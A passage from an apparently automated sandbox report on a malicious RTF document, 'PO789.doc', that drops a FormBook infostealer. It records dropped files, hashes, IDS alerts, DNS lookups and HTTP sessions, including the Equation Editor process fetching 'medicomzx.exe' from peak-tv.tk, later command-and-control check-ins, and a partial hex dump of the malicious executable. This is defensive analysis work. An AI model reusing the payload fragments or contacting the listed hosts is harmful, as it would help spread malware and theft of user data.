                                                                          SHA-512:81058FD9BAE0CED6E9EDAE6C25AB053FAEA2347357B2316B0DE6A25A6CE8EDE5C0AC8F6A2B3B527EE775140FF50FCBBA22223C1E4C5A712B315D0B6C81B53659
                                                                          Malicious:false
                                                                          Preview: L..................F.... .....?.....?...........S...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2..S...T.. .PO789.doc.@.......S ..S .*.........................P.O.7.8.9...d.o.c.......s...............-...8...[............?J......C:\Users\..#...................\\745481\Users.user\Desktop\PO789.doc. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.7.8.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......745481..........D_....3N...W...9..g............[D_....3N...W...9..g............[....
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):4.643794821759313
                                                                          Encrypted:false
                                                                          SSDEEP:3:bDuMJlt+jomX1gHjov:bCmQIDy
                                                                          MD5:DAE12E95560EA2CA4F86AC4515A68F33
                                                                          SHA1:5A1ACBDF73F62480BEFE51B3DF654745BF6AAE74
                                                                          SHA-256:141FA7A3959432D83CCA3841FDDFDA6108B2BCA2FFAED58CE4146A9D2BF898AD
                                                                          SHA-512:152A5EA111E388591175CC2386DAE6ED8CF7B4CCCED0B73339142FAA41122B94D64098F9F8312B7B6BA2078609438DCA5F617773C68310A45753F9E7D2B54381
                                                                          Malicious:false
                                                                          Preview: [folders]..Templates.LNK=0..PO789.LNK=0..[doc]..PO789.LNK=0..
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:false
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                          C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):707072
                                                                          Entropy (8bit):7.1557818019777
                                                                          Encrypted:false
                                                                          SSDEEP:6144:Y+xYKKAB5ADeIVvcDK8OpvlmXsC2GxfjpWHpxFvMUXvoHVgDaiYCpslXGqoohdZy:Y+bYeIVwl5dCWdloqXkz53iA55suuI
                                                                          MD5:8807C2E0F2973A22812AF6E61BA72667
                                                                          SHA1:20BDCA62A8D0C98F8DB2C9FF1E3AB13DC4849514
                                                                          SHA-256:4228CCE8278F840721D9F04FEA140B942C14D45938D07C1FA36A29712DDA441C
                                                                          SHA-512:05AF426C3133B5B71F74E6754C139ACD8BAA6C3A492719C223403C9F859CDF9EFE12739D8B35C9CB2E4126FA54080E91894AB6A40E417894EF14A218B88FA527
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: Metadefender, Detection: 34%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 51%
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............P.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......................$...`#............................................("...*&..(#....*.s$........s%........s&........s'........s(........*...0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0..<........~.....(......,!r...p.....(/...o0...s1............~.....+..*.0...........~.....+..*".......*.0..&........(....r%..p~....o2...(3.....t$....+..*Vs....(4...t.........*..(5...*.0..........
                                                                          C:\Users\user\Desktop\~$PO789.doc
                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):2.5038355507075254
                                                                          Encrypted:false
                                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                          Malicious:true
                                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                          Static File Info

                                                                          General

                                                                          File type:Rich Text Format data, unknown version
                                                                          Entropy (8bit):3.6305852926898945
                                                                          TrID:
                                                                          • Rich Text Format (5005/1) 55.56%
                                                                          • Rich Text Format (4004/1) 44.44%
                                                                          File name:PO789.doc
                                                                          File size:21489
                                                                          MD5:6c28e31d32e97db724188025636ac25e
                                                                          SHA1:c5818d1883785293dfab00d2c1389b82cc74ad60
                                                                          SHA256:c24d7ca6493677f640cf6d4a90c746f949749f46e45873d77a71b94ab707a21f
                                                                          SHA512:a22a65663670274098a9259314e1789b97d8ca1a11e8758eb08ee673d19755bf836f2346167dfaec5839a2ab77ff45c922e792b609c17c3c92d771c5d4af8463
                                                                          SSDEEP:384:d5vSln/51N+CYmIX1GeQC9/x7U3AJul04:d5vSln/N+LGeQCmwue4
                                                                          File Content Preview:{\rtf872.%^@+*&78-[/?_?,0.638<~-6?%';[.1,#35-4#^`.??.@[3_.4,33&1$/9*]'7?*?%~+6?0.@!?_'6)5->?$]~+:;*,.;?./1&46|'_+]??!`?[+*;=@??|'?79'%+;%?=~'|,+.$6??%*1($9?,`?,;.;]&%*!_566=##@_|~+/%5$?%$190`%'30,+%7=|.[:.,?]18[<1~>).?>3#*,.?`41@27?3.#;@;2_?6014~#%@0+(>50

                                                                          File Icon

                                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                                          Static RTF Info

                                                                          Objects

                                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                          0000010C4hno
                                                                          100001073hno

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          01/13/22-18:18:34.850775TCP1201ATTACK-RESPONSES 403 Forbidden804916823.227.38.74192.168.2.22
                                                                          01/13/22-18:18:53.504983TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.102.136.180
                                                                          01/13/22-18:18:53.504983TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.102.136.180
                                                                          01/13/22-18:18:53.504983TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917080192.168.2.2234.102.136.180
                                                                          01/13/22-18:18:53.620393TCP1201ATTACK-RESPONSES 403 Forbidden804917034.102.136.180192.168.2.22
                                                                          01/13/22-18:19:03.995932TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.2291.195.240.13
                                                                          01/13/22-18:19:03.995932TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.2291.195.240.13
                                                                          01/13/22-18:19:03.995932TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917280192.168.2.2291.195.240.13

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 13, 2022 18:17:00.130606890 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.157335997 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.157475948 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.157764912 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.184355974 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184818029 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184843063 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184859991 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184878111 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184895039 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184906960 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184921980 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.184923887 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184942007 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184943914 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.184954882 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.184958935 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184976101 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.184998035 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.185000896 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.185004950 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.194046974 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211577892 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211611986 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211626053 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211641073 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211658955 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211677074 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211694002 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211710930 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211728096 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211735964 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211745024 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211757898 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211760998 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211760998 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211777925 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211785078 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211795092 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211801052 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211810112 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211818933 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211827040 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211834908 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211843967 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211858988 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211862087 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211874008 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211888075 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211889982 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211891890 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211911917 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.211913109 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211920977 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.211966991 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.212903976 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238516092 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238545895 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238562107 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238579035 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238579035 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238596916 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238604069 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238615036 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238624096 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238631964 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238647938 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238648891 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238666058 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238667965 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238682985 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238688946 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238699913 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238715887 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238717079 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238734007 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238737106 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238750935 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238756895 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238768101 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238779068 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238785028 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238801003 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238801003 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238818884 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238820076 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238836050 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238842964 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238858938 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238859892 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238877058 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238879919 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238893032 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238899946 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238910913 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238919020 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238926888 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238941908 CET4916780192.168.2.222.58.149.41
                                                                          Jan 13, 2022 18:17:00.238943100 CET80491672.58.149.41192.168.2.22
                                                                          Jan 13, 2022 18:17:00.238960028 CET80491672.58.149.41192.168.2.22

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 13, 2022 18:17:00.061178923 CET5216753192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:17:00.109055042 CET53521678.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:18:34.665961027 CET5059153192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:18:34.698467016 CET53505918.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:18:53.462610960 CET5780553192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:18:53.484441042 CET53578058.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:18:58.635457993 CET5903053192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:18:58.766792059 CET53590308.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:19:03.935352087 CET5918553192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:19:03.973486900 CET53591858.8.8.8192.168.2.22
                                                                          Jan 13, 2022 18:19:09.561289072 CET5561653192.168.2.228.8.8.8
                                                                          Jan 13, 2022 18:19:09.586139917 CET53556168.8.8.8192.168.2.22

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Jan 13, 2022 18:17:00.061178923 CET192.168.2.228.8.8.80x65b0Standard query (0)peak-tv.tkA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:34.665961027 CET192.168.2.228.8.8.80xfc43Standard query (0)www.prestigiousuniforms.comA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:53.462610960 CET192.168.2.228.8.8.80x9c63Standard query (0)www.muzicalbox.comA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:58.635457993 CET192.168.2.228.8.8.80x30e0Standard query (0)www.extraordinarymiracle.comA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:03.935352087 CET192.168.2.228.8.8.80x9037Standard query (0)www.realstakepool.comA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:09.561289072 CET192.168.2.228.8.8.80xce43Standard query (0)www.danielkcarter.storeA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Jan 13, 2022 18:17:00.109055042 CET8.8.8.8192.168.2.220x65b0No error (0)peak-tv.tk2.58.149.41A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:34.698467016 CET8.8.8.8192.168.2.220xfc43No error (0)www.prestigiousuniforms.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 13, 2022 18:18:34.698467016 CET8.8.8.8192.168.2.220xfc43No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:53.484441042 CET8.8.8.8192.168.2.220x9c63No error (0)www.muzicalbox.commuzicalbox.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 13, 2022 18:18:53.484441042 CET8.8.8.8192.168.2.220x9c63No error (0)muzicalbox.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:58.766792059 CET8.8.8.8192.168.2.220x30e0No error (0)www.extraordinarymiracle.com109.94.209.123A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:03.973486900 CET8.8.8.8192.168.2.220x9037No error (0)www.realstakepool.com91.195.240.13A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:09.586139917 CET8.8.8.8192.168.2.220xce43No error (0)www.danielkcarter.store172.67.181.75A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:09.586139917 CET8.8.8.8192.168.2.220xce43No error (0)www.danielkcarter.store104.21.83.204A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • peak-tv.tk
                                                                          • www.prestigiousuniforms.com
                                                                          • www.muzicalbox.com
                                                                          • www.extraordinarymiracle.com
                                                                          • www.realstakepool.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.22491672.58.149.4180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:17:00.157764912 CET0OUTGET /medicomzx.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: peak-tv.tk
                                                                          Connection: Keep-Alive
                                                                          Jan 13, 2022 18:17:00.184818029 CET2INHTTP/1.1 200 OK
                                                                          Date: Thu, 13 Jan 2022 17:17:00 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Tue, 11 Jan 2022 16:19:34 GMT
                                                                          ETag: "aca00-5d550d19904c2"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 707072
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/octet-stream
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 9c dd 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 b4 0a 00 00 14 00 00 00 00 00 00 d6 d2 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 d2 0a 00 4f 00 00 00 00 e0 0a 00 a8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc b2 0a 00 00 20 00 00 00 b4 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 10 00 00 00 e0 0a 00 00 12 00 00 00 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 d2 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c f4 01 00 18 bb 02 00 03 00 00 00 cb 02 00 06 24 af 04 00 60 23 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 22 00 00 0a 2a 26 00 02 28 23 00 00 0a 00 2a ce 73 24 00 00 0a 80 01 00 00 04 73 25 00 00 0a 80 02 00 00 04 73 26 00 00 0a 80 03 00 00 04 73 27 00 00 0a 80 04 00 00 04 73 28 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2e 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2f 00 00 0a 6f 30 00 00 0a 73 31 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 25 00 00 70 7e 07 00 00 04 6f 32 00 00 0a 28 33 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 56 73 0e 00 00 06 28 34 00 00 0a 74 06 00 00 02 80 08 00 00 04 2a 1e 02 28 35 00 00 0a 2a 13 30 01 00 0b 00 00 00 09 00 00 11 00 7e 08 00 00 04 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 28 0f 00 00 06 0a 2b 00 06 2a 00 1b 30 02 00 31 00 00 00 0a 00 00 11 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELaP @ @O H.text `.rsrc@@.reloc@BH$`#("*&(#*s$s%s&s's(*0~o)+*0~o*+*0~o++*0~o,+*0~o-+*0<~(.,!rp(/o0s1~+*0~+*"*0&(r%p~o2(3t$+*Vs(4t*(5*0~+*0(+*01


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.224916823.227.38.7480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:18:34.728436947 CET749OUTGET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.prestigiousuniforms.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 13, 2022 18:18:34.850775003 CET750INHTTP/1.1 403 Forbidden
                                                                          Date: Thu, 13 Jan 2022 17:18:34 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          X-Sorting-Hat-PodId: 179
                                                                          X-Sorting-Hat-ShopId: 59690647732
                                                                          X-Dc: gcp-europe-west1
                                                                          X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Download-Options: noopen
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Server: cloudflare
                                                                          CF-RAY: 6cd048db19b64333-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
